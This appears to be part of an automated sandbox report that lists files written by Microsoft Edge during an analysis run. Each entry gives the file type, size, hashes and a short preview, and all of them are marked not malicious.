SSDEEP:6:HUVvwVq2PCHhJ23oH+TcwtpIFUt8YUUSgZmw+YUUSIkwOCHhJ23oH+Tcwta/WLJ:9vBYebmFUt8SX/+SF56YebaUJ
MD5:B98C66CF59BF3C7CBA6E29FA72DF5565
SHA1:03411BB904CFF4562B1FC9BB64948609638BAA93
SHA-256:DBD26265859332718D071A047F513DA213F3909F25979D13FAF92F7C369A32CF
SHA-512:3309DE8041C5C9EC38CF730A9CA7784FB81AEF9E0BB5F0814D1156D0C3A772CDD1EA6D48F548F0C399ED9C9962A18538F200545B8B897FCB4FCE3CBF792E3C07
Malicious:false
Preview:2024/11/18-10:53:35.237 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/18-10:53:35.238 f20 Recovering log #3.2024/11/18-10:53:35.238 f20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:dropped
Size (bytes):196608
Entropy (8bit):1.2649406643685077
Encrypted:false
SSDEEP:384:KrJ/2qOB1nxCkMHSAELyKOMq+8QTQKC+CVum6:K0q+n0JH9ELyKOMq+8Q7l
MD5:A5C1C9EACA1E6F2C735AC00B063D6E7D
SHA1:27A2DCC19D6830833846FB61D53DF7D307B888B4
SHA-256:E1D93E81243C1CC73B0393D9EB68FD23398760B089F0CDF5F5651534A6E0F315
SHA-512:7A08F3E8A48C3A92E60807A59CC516D5DAF6F8A76DACE2E6B14968E1B57C2D494ECB8FC5C770477D6D5DB4823C22891F96FD8DB5426031C63825BD7AEC429F7E
Malicious:false
Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):25029
Entropy (8bit):5.566551004421152
Encrypted:false
SSDEEP:768:JGrdUSWPs2fYEi58F1+UoAYDCx9Tuqh0VfUC9xbog/OVU1SJUrwqUWpHtuw:JGrdUSWPs2f1Eu1jaRwJNqUit/
MD5:CCB25D9BF3CDF2D108B7FB4A69B25217
SHA1:9209729D6D8026A857E130BF8715D2587C95C062
SHA-256:7472CB3211F2CDF16624306E74A6C19CCE6697F961893A47E26B75E356C7EEBB
SHA-512:DA12E6ECD13B9A47FD3607AFB748760EA0861D72FA9D4658D51F683B128120CA3A59DFBA0D8DB888E73850B7090711FD2819583A36D2E01711A001CE74CD5707
Malicious:false
Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376418815238455","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376418815238455","location":5,"ma

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:L:L
MD5:5058F1AF8388633F609CADB75A75DC9D
SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:false
Preview:.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, writer version 2, read version 2, file counter 8, database pages 11, cookie 0x7, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):45056
Entropy (8bit):0.4604018482746456
Encrypted:false
SSDEEP:24:TSWUYP5/ZrK/AxH1Aj5sAFWZmasamfDsCBjy8RCLYQcI5fc:TnUYVAKAFXX+HkQcEc
MD5:6AD81BE4344EA5AF410DBA189F99F9BB
SHA1:0D8F65D3C6D64A172EF51E9C501C23B8C7C442AA
SHA-256:1D24AEA9A1742DDAC468BD56E51A3C96C0DB82A6ABF2ECA5CE28723DDE041C9B
SHA-512:4BE031206144194C1F3CB59D2227DFEA8742A50EE4057C3B0F9E855D7B3EC91C69EE7CD41B9C9C30C18189F2F2C5F7ED360513BDF4B9EA35A3EEC9A18ADA972C
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j..................?.P................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.05416204572600966
Encrypted:false
SSDEEP:6:GtStutrStutNl/6R9XjhslotGLNl0ml/Vl/XoQXEl:MtVtNl/6L1EjVl/PvoQ
MD5:D59594A110D011EF4877BA1CF760F25A
SHA1:078B0BA0084E25281CDF35A933EE45F54FC45B67
SHA-256:FA10228344AA2914722EEAC144F7F6AB33A09DC33E1D6118913746B043BE6E4C
SHA-512:8F13FD9A77217597F1F2F217F09F7FF4C45A21E9C6502FDB12176246D39F9496291991DF64C3F79727684B58F237A67A9136054289AACA4BDE141F32DD95288D
Malicious:false
Preview:..-.....................<S#..(Y..XE6.:...0..`s<...-.....................<S#..(Y..XE6.:...0..`s<.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite Write-Ahead Log, version 3007000
Category:dropped
Size (bytes):86552
Entropy (8bit):0.8690733318119963
Encrypted:false
SSDEEP:96:9jUx1uT/r8ZNsZzMNsDKO5NszeRNsdtfbId:kmztFSyMbO
MD5:632A6848A8B9939A8C0148A80E56A722
SHA1:17E77EC8EE79BF415623C7D04C9A59D2E55AF7E4
SHA-256:11E148B07A3FD69241B7E114BA5F0106CD7E976B809B00E26B719B42A2DC7E25
SHA-512:10A204252AAED3F40A1293014F5F4495AE821A5354F39915372DCB064568FEAF808320C9CA537911E21C7BCFB1431D4037D9212C22819DD1A98F4D2464773E97
Malicious:false
Preview:7....-...........XE6.:...,\...n..........XE6.:...^.J.~.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):324
Entropy (8bit):5.244266829192017
Encrypted:false
SSDEEP:6:HUnq2PCHhJ23oH+TcwtfrK+IFUt8YURXZmw+YURFkwOCHhJ23oH+TcwtfrUeLJ:yvBYeb23FUt83/+l56Yeb3J
MD5:605B72E9AD5028F598E7F9FC40D642CA
SHA1:BE6F0B48A28A9638B822FAE0E7C7C50B8876B69C
SHA-256:EEC142E1C419FDBB5A6C67D78F8CD4864AEFC4AA2271193601194C107BA4E50C
SHA-512:C3BD8E4C33ACCA26D176DE45A471F3BEC7F67B5AD18D0C771FDC97C40A9C822B85E2DDD3461B9306EC36CFD964ABCC591DFE0E3F9A2B1C5B40B436D9E7EC58D2
Malicious:false
Preview:2024/11/18-10:53:36.316 1f34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/18-10:53:36.317 1f34 Recovering log #3.2024/11/18-10:53:36.317 1f34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                              Entropy (8bit):5.244266829192017
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUnq2PCHhJ23oH+TcwtfrK+IFUt8YURXZmw+YURFkwOCHhJ23oH+TcwtfrUeLJ:yvBYeb23FUt83/+l56Yeb3J
                                                                                                                                                                                                                              MD5:605B72E9AD5028F598E7F9FC40D642CA
                                                                                                                                                                                                                              SHA1:BE6F0B48A28A9638B822FAE0E7C7C50B8876B69C
                                                                                                                                                                                                                              SHA-256:EEC142E1C419FDBB5A6C67D78F8CD4864AEFC4AA2271193601194C107BA4E50C
                                                                                                                                                                                                                              SHA-512:C3BD8E4C33ACCA26D176DE45A471F3BEC7F67B5AD18D0C771FDC97C40A9C822B85E2DDD3461B9306EC36CFD964ABCC591DFE0E3F9A2B1C5B40B436D9E7EC58D2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.316 1f34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/18-10:53:36.317 1f34 Recovering log #3.2024/11/18-10:53:36.317 1f34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):753
                                                                                                                                                                                                                              Entropy (8bit):4.037333775091125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
                                                                                                                                                                                                                              MD5:C5675C35B320A0898802E1ECFD3476E8
                                                                                                                                                                                                                              SHA1:B6CA1C2EE1340662A7B495778416988006748327
                                                                                                                                                                                                                              SHA-256:8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
                                                                                                                                                                                                                              SHA-512:DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                              Entropy (8bit):5.2268511826871125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUdUXq2PCHhJ23oH+TcwtfrzAdIFUt8YUHDWZmw+YU4PkwOCHhJ23oH+TcwtfrzS:NvBYeb9FUt8JW/+G56Yeb2J
                                                                                                                                                                                                                              MD5:720F0D9A9F58053D69861B99D3C9D8CD
                                                                                                                                                                                                                              SHA1:7D1013550DB4FC06188E26947344FBF445F27E4F
                                                                                                                                                                                                                              SHA-256:682F97B819237018535B63E10F71B2119D84375832A9E6C82F48FCD31E52594A
                                                                                                                                                                                                                              SHA-512:F42A01D2F8282B6EF522B9E5DB7BCB017B08BB14C25EF2DA42122D1E91A5D0A56CF03D104D2554600AAE21E37B2B8A39ACA3B05BC7AFE1B5C3EB973DEFB9B3E1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.241 1f34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/18-10:53:36.305 1f34 Recovering log #3.2024/11/18-10:53:36.307 1f34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                              Entropy (8bit):5.2268511826871125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUdUXq2PCHhJ23oH+TcwtfrzAdIFUt8YUHDWZmw+YU4PkwOCHhJ23oH+TcwtfrzS:NvBYeb9FUt8JW/+G56Yeb2J
                                                                                                                                                                                                                              MD5:720F0D9A9F58053D69861B99D3C9D8CD
                                                                                                                                                                                                                              SHA1:7D1013550DB4FC06188E26947344FBF445F27E4F
                                                                                                                                                                                                                              SHA-256:682F97B819237018535B63E10F71B2119D84375832A9E6C82F48FCD31E52594A
                                                                                                                                                                                                                              SHA-512:F42A01D2F8282B6EF522B9E5DB7BCB017B08BB14C25EF2DA42122D1E91A5D0A56CF03D104D2554600AAE21E37B2B8A39ACA3B05BC7AFE1B5C3EB973DEFB9B3E1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.241 1f34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/18-10:53:36.305 1f34 Recovering log #3.2024/11/18-10:53:36.307 1f34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):0.0018090556708630736
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZl2tl:/M/xT02zTtl
                                                                                                                                                                                                                              MD5:15278775286811AE932B7DE33C4C6AA0
                                                                                                                                                                                                                              SHA1:099CCCD7C00825B904617AA90A7673F251B527D5
                                                                                                                                                                                                                              SHA-256:CF095E578BD90711C0E7CD4EEFB408D486AEDE86E0F475B8DA0869A3D2EBC35F
                                                                                                                                                                                                                              SHA-512:FD6A29C169231DBF8069F43E9AB02B189A33CC4F7976B52A1E8139BC1E4062E2645EB7A9B27A3FD162B48F191B546266B1B27D631E8CC72ED54566D7A90E973B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZlbvAul:/M/xT02zCFl
                                                                                                                                                                                                                              MD5:EF71BC9CF3005FB27E9F63FFB7352EC0
                                                                                                                                                                                                                              SHA1:6115664BCA6893BE9A683C4FED8D61CD526F1CD5
                                                                                                                                                                                                                              SHA-256:929E3C49CA66F667BC0F2D53F326D07F27D8A4929C86DA63F07937DEA70B0A60
                                                                                                                                                                                                                              SHA-512:CCA37BE38202B541F2E0E1CF71F0426B0A07446056B74139B826CDDBDCA8E02071591EFEFDEEE81EDE2FD92F14D7CE487B233BDB0DD55CBB2F43F137512652FC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):120
                                                                                                                                                                                                                              Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                              MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                              SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                              SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                              SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:117.0.2045.47
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090520956326506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keCLmZtstR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynJtGhOxqQoRTuiVIos
                                                                                                                                                                                                                              MD5:F25ADC1325EDB7883A8F2DE24372A781
                                                                                                                                                                                                                              SHA1:9E1666A98593919EB1D757A66F662176E46173B5
                                                                                                                                                                                                                              SHA-256:B2F4DA5AB8E316E646C16375B44B637BBE18DBBD9E858CF2CB59F3E89E24F0FA
                                                                                                                                                                                                                              SHA-512:FEF6A872E58C00574A6C13C838E69C64284BDF17D255BA1EF64FCDD5548E25054AFB062826D36C15AB4AF8CC3F744BA54C65AEFE979A6E89B3CAF06D513EEADE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090520956326506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keCLmZtstR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynJtGhOxqQoRTuiVIos
                                                                                                                                                                                                                              MD5:F25ADC1325EDB7883A8F2DE24372A781
                                                                                                                                                                                                                              SHA1:9E1666A98593919EB1D757A66F662176E46173B5
                                                                                                                                                                                                                              SHA-256:B2F4DA5AB8E316E646C16375B44B637BBE18DBBD9E858CF2CB59F3E89E24F0FA
                                                                                                                                                                                                                              SHA-512:FEF6A872E58C00574A6C13C838E69C64284BDF17D255BA1EF64FCDD5548E25054AFB062826D36C15AB4AF8CC3F744BA54C65AEFE979A6E89B3CAF06D513EEADE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090520956326506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keCLmZtstR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynJtGhOxqQoRTuiVIos
                                                                                                                                                                                                                              MD5:F25ADC1325EDB7883A8F2DE24372A781
                                                                                                                                                                                                                              SHA1:9E1666A98593919EB1D757A66F662176E46173B5
                                                                                                                                                                                                                              SHA-256:B2F4DA5AB8E316E646C16375B44B637BBE18DBBD9E858CF2CB59F3E89E24F0FA
                                                                                                                                                                                                                              SHA-512:FEF6A872E58C00574A6C13C838E69C64284BDF17D255BA1EF64FCDD5548E25054AFB062826D36C15AB4AF8CC3F744BA54C65AEFE979A6E89B3CAF06D513EEADE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090520956326506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keCLmZtstR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynJtGhOxqQoRTuiVIos
                                                                                                                                                                                                                              MD5:F25ADC1325EDB7883A8F2DE24372A781
                                                                                                                                                                                                                              SHA1:9E1666A98593919EB1D757A66F662176E46173B5
                                                                                                                                                                                                                              SHA-256:B2F4DA5AB8E316E646C16375B44B637BBE18DBBD9E858CF2CB59F3E89E24F0FA
                                                                                                                                                                                                                              SHA-512:FEF6A872E58C00574A6C13C838E69C64284BDF17D255BA1EF64FCDD5548E25054AFB062826D36C15AB4AF8CC3F744BA54C65AEFE979A6E89B3CAF06D513EEADE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                              Entropy (8bit):0.5898156356912286
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TLyeuAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isXuymds6BbrdFLt4l0r:TLyXOUOq0afDdWec9sJwziZ4Z7J5fc
                                                                                                                                                                                                                              MD5:DEE6B30FA987F315C47F9F5D037DA482
                                                                                                                                                                                                                              SHA1:3B439394FDBEE3E6322867EC8A77E6616C907D49
                                                                                                                                                                                                                              SHA-256:9EECB1D073647DBAC1040EA9743357EE284CAFFD01E68BA2CFCEF4705CD30F98
                                                                                                                                                                                                                              SHA-512:3697E9D5311E479E13AC5D5C51820BAA6B823E8F90C7FE7AB41E667BE462D712E21CAFD7BAD9B99CC3E78560F1920C2CB4E87AAFD791168DFD27355D04E56D5C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZlol:/M/xT02zPl
                                                                                                                                                                                                                              MD5:07DBBAF5E0B3AAC586751C37EE95CBD7
                                                                                                                                                                                                                              SHA1:B2E980AD36E1B75A03686C1E97FFDA55DD0A981F
                                                                                                                                                                                                                              SHA-256:D0C6EF6E32AC1A284162265CF845B10CE7C73C763F4D6252206124D1B3522928
                                                                                                                                                                                                                              SHA-512:482C46974E07F835094F76674550B1D1E829200565E452BFA9F480256A28EA9E841A4D42218AD74734F7D8BC7806DB9F8A053B2DC09FE672B7BE3702BFA92CE6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                              Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                              MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                              SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                              SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
